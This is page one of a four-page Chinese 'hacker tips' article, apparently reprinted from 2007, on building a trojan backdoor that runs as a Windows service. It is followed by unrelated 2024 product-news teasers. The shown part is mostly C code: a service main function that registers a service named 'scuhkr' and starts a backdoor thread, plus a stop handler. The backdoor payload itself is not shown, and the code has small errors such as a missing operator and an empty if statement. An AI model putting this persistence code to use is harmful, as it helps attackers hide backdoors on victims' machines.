黑客技巧：如何做服务级的木马后门

互联网 | 编辑: 杨剑锋 2007-07-30 16:14:00转载一键看全文

服务函数

本程序只提供了一个服务函数BDServiceMain()，下面我们来下完成这个函数的功能，示例代码如下：

void WINAPI BDServiceMain(DWORD dwArgc, LPTSTR *lpszArgv)
{
DWORD dwThreadId; //存放线程ID

//通过RegisterServiceCtrlHandler()与服务控制程序建立一个通信的协议。
//BDHandler()是我们的服务控制程序，它被可以被用来开始，暂停，恢复，停止服务等控制操作
if (!(ServiceStatusHandle = RegisterServiceCtrlHandler("scuhkr",
              BDHandler))) 
return;

//表示该服务私有
ServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
//初始化服务，正在开始
ServiceStatus.dwCurrentState = SERVICE_START_PENDING; //
//服务可以接受的请求，这里我们只接受停止服务请求和暂停恢复请求
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP
              　 SERVICE_ACCEPT_PAUSE_CONTINUE;
//下面几个一般我们不大关心，全为0
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode     = 0;
ServiceStatus.dwCheckPoint         = 0;
ServiceStatus.dwWaitHint         = 0;
//必须调用SetServiceStatus()来响应服务控制程序的每次请求通知
SetServiceStatus(ServiceStatusHandle, &ServiceStatus);

//开始运行服务
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;

SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//我们用一个事件对象来控制服务的同步
if (!(hEvent=CreateEvent(NULL, FALSE, FALSE, NULL)))
return;

ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;

SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//开线程来启动我们的后门程序
if (!(hThread=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MainFn, (LPVOID)0, 0, 
&dwThreadId)))


ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;

WaitForSingleObject(hEvent, INFINITE);

CloseHandle(hThread);
ExitThread(dwThreadId);
CloseHandle(hEvent);

return;
}

上面我们调用了一个服务控制函数BDHandler()，由于只是简单的介绍，我们这里只处理服务停止控制请求的情况，其它暂停、恢复等功能，读者可以自己完善。下面是对BDHandler()的实现代码：

void WINAPI BDHandler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
//等待后门程序的停止
ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;

SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//设时间为激发状态，等待下一个事件的到来
SetEvent(hEvent);

ServiceStatus.dwCurrentState = SERVICE_STOP;
ServiceStatus.dwCheckPoint   = 0;
ServiceStatus.dwWaitHint   = 0;
//停止
SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
break;

default:
break;
}
}

提示：试试键盘 “← →” 可以实现快速翻页

总共 4 页< 上一页 1 2 3 4 下一页 >

一键看全文

本文导航

每日精选

ROG游戏手机9系列新品发布会直播

ROG游戏手机9系列11月19日19:00新品发布，反正超AI玩！等你来看！

标签：游戏手机| ROG9| 发布会| 直播| 2024-11-19
引领豪华MPV新趋势比亚迪夏内饰科技广州车展首发

比亚迪第五代DM技术中大型旗舰MPV夏内饰科技在广州车展正式发布，从技术、平台、安全、设计、空间、智享、智驾七大维度，全面引领豪华MPV新趋势，将于2025年一季度上市。

标签：比亚迪| 夏| MPV| 广州车展| 2024-11-15
余承东说漏嘴了华为Mate 70系列26号发布

在11月15日广州车展中，华为余承东在直播活动中意外透露了华为Mate 70系列的发布时间，新机将在11月26日正式推出。

标签：华为| 华为Mate70| 余承东| 发布| 2024-11-15
红魔10 Pro上手体验：风扇加持，堪称游戏党梦中情机

红魔10 Pro以独特的设计、出色的性能与稳定的影像表现，成为当前电竞旗舰手机中的佼佼者。它不仅是行业中少有的背部纯平设计，搭配6.85寸全面屏，带来极具视觉冲击的体验，整体外观显得更加规整、精致。

标签：红魔| 10| Pro| 带来| 极致| 2024-11-19
OPPO Pad 3即将登场 2.8K原彩仿书柔光屏，学生党必备

OPPO发布了OPPO Pad 3平板新品的外观图，拥有星轨亮银、霞光紫、夜幕蓝、三个配色。

标签： OPPO| OPPOPad3| 平板| 2024-11-15
Q3中国智能盒子线上零售量同比-5.5% 小米市场份额13.1%

2024年第三季度，中国智能盒子线上市场的零售量为31.2万台，同比下降5.5%，环比增长22.0%。

标签：小米| 智能盒子| 2024-11-15
立足中国走向全球 openEuler开源五年装机千万

以“以智能，致世界”为主题的操作系统大会2024在北京中关村国际创新中心召开，本次大会由openEuler社区、全球计算联盟共同主办，旨在汇聚全球产业界力量，推动基础软件根技术持续创新。

标签： openEuleopenEuler社区| 开源| 2024-11-15
极氪亮相广州车展首发浩瀚智驾2.0端到端Plus架构

2024广州国际车展，极氪浩瀚智驾2.0首发面向高阶智驾的端到端Plus架构，让“智驾更类人、人驾更省心”。同时，极氪携旗下全系车型亮相广州车展，打造多场景出行极致体验。

标签：极氪| 广州车展| 浩瀚| 智驾| 2024-11-15
阿维塔11双动力广州车展开启预售 29.99万元起

阿维塔11增程搭载领先一代昆仑增程、宁德时代骁遥超级增混电池等领先技术，为用户带来极致强劲、极致静谧、极致省心的出行体验。

标签：阿维塔| 阿维塔11| 增程| 广州车展| 2024-11-15
创新助力新质人才培养华为擎云高教职教解决方案亮相第62届高博会

华为擎云携自主创新实训室、自主创新GIS教育平台、AR Engine、Vision Glass等智慧教育解决方案参展第62届中国高等教育博览会。

标签：华为| 擎云| 高博会| 教育| 2024-11-15